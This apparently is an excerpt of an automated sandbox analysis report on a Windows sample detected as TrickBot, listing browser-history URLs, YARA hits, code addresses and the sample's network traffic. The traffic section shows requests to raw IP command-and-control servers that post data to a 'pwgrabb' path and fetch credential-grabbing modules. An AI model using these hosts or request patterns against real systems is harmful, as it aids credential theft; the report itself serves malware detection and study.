      Source: History.bak.13.drString found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/?ms.officeurl=setup
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/?ms.officeurl=setupMicrosoft
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8.
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue/
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2F
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2F
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup2V
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3DsetupSign
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8-_
      Source: History.bak.13.drString found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
      Source: History.bak.13.drString found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
      Source: Web Data.bak.13.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
      Source: Web Data.bak.13.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: History.bak.13.drString found in binary or memory: https://windows-drivers-x04.blogspot.com/2013/06/bios320exe-64-bit-download.html
      Source: History.bak.13.drString found in binary or memory: https://windows-drivers-x04.blogspot.com/2013/06/bios320exe-64-bit-download.htmlBios320.Exe
      Source: History.bak.13.drString found in binary or memory: https://www.alldrivers4devices.net/blogstat/click.php?f=bios320_exe64bit.rar%3E%3Cspan%20style=
      Source: History.bak.13.drString found in binary or memory: https://www.alldrivers4devices.net/blogstat/click.php?f=bios320_exe64bit.rar%3E%3Cspan%20style=Drive
      Source: History.bak.13.drString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
      Source: History.bak.13.drString found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
      Source: History.bak.13.drString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/7
      Source: History.bak.13.drString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/AutoIt
      Source: History.bak.13.drString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
      Source: Web Data.bak.13.drString found in binary or memory: https://www.google.com/favicon.ico
      Source: History.bak.13.drString found in binary or memory: https://www.google.com/search?q=adobe
      Source: History.bak.13.drString found in binary or memory: https://www.google.com/search?q=at
      Source: History.bak.13.drString found in binary or memory: https://www.google.com/search?q=autoit
      Source: History.bak.13.drString found in binary or memory: https://www.google.com/search?q=bios320.exe
      Source: History.bak.13.drString found in binary or memory: https://www.google.com/search?q=firefox
      Source: History.bak.13.drString found in binary or memory: https://www.google.com/search?q=java
      Source: History.bak.13.drString found in binary or memory: https://www.google.com/search?q=testzentrum
      Source: History.bak.13.drString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
      Source: History.bak.13.drString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releaseDownload
      Source: History.bak.13.drString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
      Source: History.bak.13.drString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
      Source: History.bak.13.drString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/Download
      Source: History.bak.13.drString found in binary or memory: https://www.office.com/setup
      Source: History.bak.13.drString found in binary or memory: https://www.office.com/setupMicrosoft
      Source: unknownHTTP traffic detected: POST /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/VERS// HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=------Boundary00F7D7B1User-Agent: curl/7.77.0Content-Length: 141Host: 46.99.175.217
      Source: unknownDNS traffic detected: queries for: ip.anysrc.net
      Source: global trafficHTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/file/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
      Source: global trafficHTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/0/Windows%2010%20x64/1108/102.129.143.91/6760749C3E0F3C8028653796E6C431FC062A0AA0107C34B734353BDE5C7824FB/K4eaS6gi8qoueakyUIyY/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
      Source: global trafficHTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/user/user/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
      Source: global trafficHTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/path/C:%5CUsers%5Cuser%5CAppData%5CRoaming%5CGNU-Rach-559H%5CdngqoAXyDd.exe/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
      Source: global trafficHTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/23/100019/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
      Source: global trafficHTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/DNSBL/listed/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
      Source: global trafficHTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
      Source: global trafficHTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabb64/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 24.45.255.9
      Source: global trafficHTTP traffic detected: GET /cookiechecker?uri=/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabb64/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 24.45.255.9Cookie: AIROS_6872516E0657=ddb722f4fb72773a791e116cf4cb38b0
      Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 24.45.255.9Cookie: AIROS_6872516E0657=ddb722f4fb72773a791e116cf4cb38b0
      Source: global trafficHTTP traffic detected: GET /login.cgi?uri=/index.html HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 24.45.255.9Cookie: AIROS_6872516E0657=ddb722f4fb72773a791e116cf4cb38b0
      Source: global trafficHTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabb64/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 202.58.199.82
      Source: global trafficHTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/dpost/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
      Source: global trafficHTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/10/62/LDBHBJFHFNV/1/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
      Source: global trafficHTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabc64/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 202.58.199.82
      Source: global trafficHTTP traffic detected: GET /plain HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: ip.anysrc.net
      Source: unknownHTTPS traffic detected: 46.99.175.217:443 -> 192.168.11.20:49778 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 24.45.255.9:443 -> 192.168.11.20:49786 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 202.58.199.82:443 -> 192.168.11.20:49800 version: TLS 1.2

      E-Banking Fraud:

      barindex
      Yara detected TrickbotShow sources
      Source: Yara matchFile source: Process Memory Space: wermgr.exe PID: 5016, type: MEMORYSTR
      Source: Yara matchFile source: 00000001.00000002.9279032092.0000000002881000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Found detection on Joe Sandbox Cloud Basic with higher scoreShow sources
      Source: dngqoAXyDd.exeJoe Sandbox Cloud Basic: Detection: malicious Score: 80 Threat Name: TrickBotPerma Link
      Source: dngqoAXyDd.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: 1_2_0075911C
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: 1_2_0074C201
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: 1_2_007582BD
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: 1_2_0075941B
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: 1_2_0074C5D3
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: 1_2_007516DE
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: 1_2_0075880E
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: 1_2_0073C950
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: 1_2_0074B9CE
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: 1_2_0074C9BB
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: 1_2_0075BBF1
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: 1_2_00745C19
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: 1_2_00757D6E
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: 1_2_00754D22
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: 1_2_00759E7F
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: 1_2_0074BE63
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: 1_2_00758EA1
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: 1_2_02883168
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECB14D0
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECC88E0
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECC1EA0
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECC4260
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECB7340
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECBC750
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECB8370
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECB2F30
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECD52C0
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECB30AA
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECC51A0
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECCED70
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECCB920
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECD4CF0
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECC9A80
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECBFE8E
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECC0A00
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECB79D0
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECC35D0
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECD45D0
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECC73A0
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECB3BB0
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECC7760
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECD5F60
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECBF700
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECD4B10
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECB4730
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECC5AC0
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECC7EE0
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECCE47D
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECC740C
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECB1030
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECD33D0
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECC17F0
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECCE3F0
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: String function: 007443E0 appears 58 times
      Source: C:\Users\user\Desktop\dngqoAXyDd.exeCode function: String function: 007475F5 appears 33 times
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECCC550 NtDelayExecution,
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECC9CD0 NtQueryInformationProcess,
      Source: C:\Windows\System32\wermgr.exeCode function: 3_2_000001767ECBC750 NtQuerySystemInformation,DuplicateHandle,FindCloseChangeNotification,RtlDeleteBoundaryDescriptor,
      Source: dngqoAXyDd.exe, 00000001.00000000.9203744354.00000000007C0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamecorrect.dll( vs dngqoAXyDd.exe
      Source: dngqoAXyDd.exeBinary or memory string: OriginalFilenamecorrect.dll( vs dngqoAXyDd.exe